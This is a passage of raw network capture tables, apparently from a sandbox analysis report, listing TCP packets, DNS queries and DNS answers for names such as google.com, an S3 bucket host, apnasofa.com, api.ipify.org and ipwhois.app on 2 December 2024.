                                                          Dec 2, 2024 17:58:02.636759043 CET4435002413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.636810064 CET50024443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.637020111 CET50024443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.637043953 CET4435002413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.637058020 CET50024443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.637065887 CET4435002413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.639980078 CET50029443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.640014887 CET4435002913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:02.640074015 CET50029443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.640232086 CET50029443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:02.640244961 CET4435002913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.475039005 CET4435002513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.475534916 CET50025443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:03.475568056 CET4435002513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.476016045 CET50025443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:03.476022959 CET4435002513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.658808947 CET4435002613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.659307003 CET50026443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:03.659331083 CET4435002613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.659743071 CET50026443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:03.659746885 CET4435002613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.956639051 CET4435002513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.959702015 CET4435002513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.959775925 CET50025443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:03.959837914 CET50025443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:03.959860086 CET4435002513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.959871054 CET50025443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:03.959876060 CET4435002513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.960772991 CET4435002713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.961172104 CET50027443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:03.961190939 CET4435002713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.961767912 CET50027443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:03.961774111 CET4435002713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.962802887 CET50030443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:03.962840080 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:03.962914944 CET50030443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:03.963069916 CET50030443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:03.963082075 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.121556044 CET4435002613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.121583939 CET4435002613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.121633053 CET50026443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.121650934 CET4435002613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.121695042 CET50026443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.121896029 CET50026443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.121896029 CET50026443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.121903896 CET4435002613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.122113943 CET4435002613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.122154951 CET4435002613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.122215033 CET50026443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.124834061 CET50031443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.124883890 CET4435003113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.124958038 CET50031443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.125113010 CET50031443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.125132084 CET4435003113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.155930042 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.156414986 CET50028443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.156436920 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.157004118 CET50028443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.157010078 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.430794954 CET4435002713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.430828094 CET4435002713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.430880070 CET50027443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.430893898 CET4435002713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.430941105 CET50027443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.431152105 CET50027443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.431169033 CET4435002713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.434616089 CET50032443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.434638023 CET4435003213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.434745073 CET50032443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.434900045 CET50032443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.434911966 CET4435003213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.505136967 CET4435002913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.506282091 CET50029443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.506314993 CET4435002913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.506885052 CET50029443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.506891012 CET4435002913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.692240953 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.692265987 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.692286968 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.692318916 CET50028443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.692329884 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.692352057 CET50028443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.692364931 CET50028443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.850034952 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.850101948 CET50028443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.850111961 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.850123882 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.850167036 CET50028443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.866470098 CET50028443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.866488934 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.866498947 CET50028443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.866504908 CET4435002813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.895015001 CET50033443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.895051956 CET4435003313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.895143986 CET50033443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.903947115 CET50033443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.903964996 CET4435003313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.959033012 CET4435002913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.959064960 CET4435002913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.959120035 CET50029443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.959131956 CET4435002913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.961296082 CET50029443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.961302042 CET4435002913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.961316109 CET50029443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.961481094 CET4435002913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.961513042 CET4435002913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.961631060 CET50029443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.972073078 CET50034443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.972100019 CET4435003413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:04.972165108 CET50034443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.972362041 CET50034443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:04.972373962 CET4435003413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:05.815664053 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:05.816138983 CET50030443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:05.816164970 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:05.816658020 CET50030443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:05.816663980 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:05.984652042 CET4435003113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:05.985224009 CET50031443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:05.985251904 CET4435003113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:05.985661983 CET50031443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:05.985667944 CET4435003113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.223952055 CET4435003213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.224570990 CET50032443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.224598885 CET4435003213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.225586891 CET50032443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.225596905 CET4435003213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.321901083 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.321926117 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.321942091 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.322057009 CET50030443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.322072983 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.322145939 CET50030443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.449985981 CET4435003113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.450016975 CET4435003113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.450093031 CET50031443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.450118065 CET4435003113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.451416016 CET50031443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.451469898 CET50031443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.451477051 CET4435003113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.451492071 CET50031443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.451647997 CET4435003113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.451684952 CET4435003113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.451765060 CET50031443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.454241037 CET50035443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.454288006 CET4435003513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.454436064 CET50035443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.454595089 CET50035443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.454611063 CET4435003513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.515945911 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.515991926 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.516025066 CET50030443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.516028881 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.516072989 CET50030443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.516087055 CET50030443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.516179085 CET50030443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.516179085 CET50030443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.516194105 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.516201973 CET4435003013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.518718004 CET50036443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.518799067 CET4435003613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.519033909 CET50036443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.519191027 CET50036443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.519227028 CET4435003613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.671581984 CET4435003313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.672060013 CET50033443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.672081947 CET4435003313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.672530890 CET50033443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.672535896 CET4435003313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.715332985 CET4435003213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.715352058 CET4435003213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.715405941 CET4435003213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.715411901 CET50032443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.715470076 CET50032443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.715626955 CET50032443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.715641975 CET4435003213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.715651035 CET50032443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.715655088 CET4435003213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.718046904 CET50037443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.718080044 CET4435003713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.718139887 CET50037443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.718298912 CET50037443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.718307018 CET4435003713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.840764046 CET4435003413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.841259956 CET50034443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.841279984 CET4435003413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:06.841712952 CET50034443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:06.841720104 CET4435003413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:07.108062029 CET4435003313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:07.108309984 CET4435003313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:07.108375072 CET50033443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:07.108405113 CET50033443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:07.108406067 CET50033443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:07.108422995 CET4435003313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:07.108433008 CET4435003313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:07.110697985 CET50038443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:07.110773087 CET4435003813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:58:07.110847950 CET50038443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:07.110963106 CET50038443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:58:07.110980034 CET4435003813.107.246.63192.168.2.4
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 2, 2024 17:55:09.517292976 CET5180553192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:09.517555952 CET5416153192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:09.654571056 CET53518051.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:09.667524099 CET53512461.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:09.718389988 CET53599211.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:09.748765945 CET53541611.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:12.689568996 CET53627831.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:13.466099024 CET5786953192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:13.467349052 CET5330953192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:13.603728056 CET53578691.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:13.604630947 CET53533091.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:14.379396915 CET6301353192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:15.263559103 CET5988453192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:15.263756990 CET5880953192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:15.738461018 CET53598841.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:15.751586914 CET53588091.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:17.816756010 CET5145953192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:17.816962957 CET5723553192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:18.844471931 CET4984153192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:18.844589949 CET5587553192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:18.992553949 CET53572351.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:18.992744923 CET53558751.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:18.992985964 CET53514591.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:18.993935108 CET53498411.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:24.508872032 CET5655653192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:24.509021044 CET6427553192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:24.518591881 CET5414653192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:24.518758059 CET5626153192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:24.737317085 CET53565561.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:24.738018036 CET53642751.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:24.738034010 CET53630991.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:24.738569975 CET53562611.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:24.739015102 CET53541461.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:25.526690006 CET138138192.168.2.4192.168.2.255
                                                          Dec 2, 2024 17:55:26.475647926 CET5844553192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:26.476048946 CET5892753192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:26.477492094 CET6115053192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:26.477650881 CET6499853192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:26.614950895 CET53611501.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:26.616444111 CET53649981.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:26.810036898 CET53589271.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:26.814457893 CET53584451.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:29.589633942 CET5443953192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:29.589982986 CET5839153192.168.2.41.1.1.1
                                                          Dec 2, 2024 17:55:29.727570057 CET53583911.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:29.727961063 CET53544391.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:29.753643990 CET53619271.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:55:49.271131039 CET53632531.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:56:08.928505898 CET53603721.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:56:12.769287109 CET53625761.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:56:39.837351084 CET53599481.1.1.1192.168.2.4
                                                          Dec 2, 2024 17:57:24.710961103 CET53619091.1.1.1192.168.2.4
                                                          TimestampSource IPDest IPChecksumCodeType
                                                          Dec 2, 2024 17:55:18.992985964 CET192.168.2.41.1.1.1c232(Port unreachable)Destination Unreachable
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 2, 2024 17:55:09.517292976 CET192.168.2.41.1.1.10x5d47Standard query (0)www.google.snA (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:09.517555952 CET192.168.2.41.1.1.10xc28Standard query (0)www.google.sn65IN (0x0001)false
                                                          Dec 2, 2024 17:55:13.466099024 CET192.168.2.41.1.1.10xcbb6Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:13.467349052 CET192.168.2.41.1.1.10x696fStandard query (0)www.google.com65IN (0x0001)false
                                                          Dec 2, 2024 17:55:14.379396915 CET192.168.2.41.1.1.10xeb35Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:15.263559103 CET192.168.2.41.1.1.10x79cfStandard query (0)i--iy.s3.us-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:15.263756990 CET192.168.2.41.1.1.10x2984Standard query (0)i--iy.s3.us-east-1.amazonaws.com65IN (0x0001)false
                                                          Dec 2, 2024 17:55:17.816756010 CET192.168.2.41.1.1.10x4bafStandard query (0)apnasofa.comA (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:17.816962957 CET192.168.2.41.1.1.10x5a09Standard query (0)apnasofa.com65IN (0x0001)false
                                                          Dec 2, 2024 17:55:18.844471931 CET192.168.2.41.1.1.10xcc56Standard query (0)apnasofa.comA (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:18.844589949 CET192.168.2.41.1.1.10x583aStandard query (0)apnasofa.com65IN (0x0001)false
                                                          Dec 2, 2024 17:55:24.508872032 CET192.168.2.41.1.1.10x8723Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:24.509021044 CET192.168.2.41.1.1.10x7f1eStandard query (0)api.ipify.org65IN (0x0001)false
                                                          Dec 2, 2024 17:55:24.518591881 CET192.168.2.41.1.1.10xe7edStandard query (0)apnasofa.comA (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:24.518758059 CET192.168.2.41.1.1.10x8d2bStandard query (0)apnasofa.com65IN (0x0001)false
                                                          Dec 2, 2024 17:55:26.475647926 CET192.168.2.41.1.1.10x7fbeStandard query (0)ipwhois.appA (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:26.476048946 CET192.168.2.41.1.1.10x42eeStandard query (0)ipwhois.app65IN (0x0001)false
                                                          Dec 2, 2024 17:55:26.477492094 CET192.168.2.41.1.1.10xc781Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:26.477650881 CET192.168.2.41.1.1.10x69a8Standard query (0)api.ipify.org65IN (0x0001)false
                                                          Dec 2, 2024 17:55:29.589633942 CET192.168.2.41.1.1.10x8e65Standard query (0)ipwhois.appA (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:29.589982986 CET192.168.2.41.1.1.10xfcfStandard query (0)ipwhois.app65IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 2, 2024 17:55:09.654571056 CET1.1.1.1192.168.2.40x5d47No error (0)www.google.sn172.217.19.227A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:13.603728056 CET1.1.1.1192.168.2.40xcbb6No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:13.604630947 CET1.1.1.1192.168.2.40x696fNo error (0)www.google.com65IN (0x0001)false
                                                          Dec 2, 2024 17:55:14.517848969 CET1.1.1.1192.168.2.40xeb35No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                          Dec 2, 2024 17:55:15.738461018 CET1.1.1.1192.168.2.40x79cfNo error (0)i--iy.s3.us-east-1.amazonaws.coms3-r-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                          Dec 2, 2024 17:55:15.738461018 CET1.1.1.1192.168.2.40x79cfNo error (0)s3-r-w.us-east-1.amazonaws.com52.217.199.10A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:15.738461018 CET1.1.1.1192.168.2.40x79cfNo error (0)s3-r-w.us-east-1.amazonaws.com52.217.233.138A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:15.738461018 CET1.1.1.1192.168.2.40x79cfNo error (0)s3-r-w.us-east-1.amazonaws.com52.217.16.40A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:15.738461018 CET1.1.1.1192.168.2.40x79cfNo error (0)s3-r-w.us-east-1.amazonaws.com52.217.207.18A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:15.738461018 CET1.1.1.1192.168.2.40x79cfNo error (0)s3-r-w.us-east-1.amazonaws.com16.15.193.69A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:15.738461018 CET1.1.1.1192.168.2.40x79cfNo error (0)s3-r-w.us-east-1.amazonaws.com3.5.8.231A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:15.738461018 CET1.1.1.1192.168.2.40x79cfNo error (0)s3-r-w.us-east-1.amazonaws.com52.217.106.120A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:15.738461018 CET1.1.1.1192.168.2.40x79cfNo error (0)s3-r-w.us-east-1.amazonaws.com16.182.70.42A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:15.751586914 CET1.1.1.1192.168.2.40x2984No error (0)i--iy.s3.us-east-1.amazonaws.coms3-r-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                          Dec 2, 2024 17:55:16.391450882 CET1.1.1.1192.168.2.40x8bc9No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                          Dec 2, 2024 17:55:16.391450882 CET1.1.1.1192.168.2.40x8bc9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.208.99A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:16.391450882 CET1.1.1.1192.168.2.40x8bc9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.208.72A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:16.391450882 CET1.1.1.1192.168.2.40x8bc9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.208.106A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:16.391450882 CET1.1.1.1192.168.2.40x8bc9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.211.38A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:16.391450882 CET1.1.1.1192.168.2.40x8bc9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.56.102A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:16.391450882 CET1.1.1.1192.168.2.40x8bc9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.56.98A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:16.391450882 CET1.1.1.1192.168.2.40x8bc9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.59.37A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:16.391450882 CET1.1.1.1192.168.2.40x8bc9No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.211.18A (IP address)IN (0x0001)false
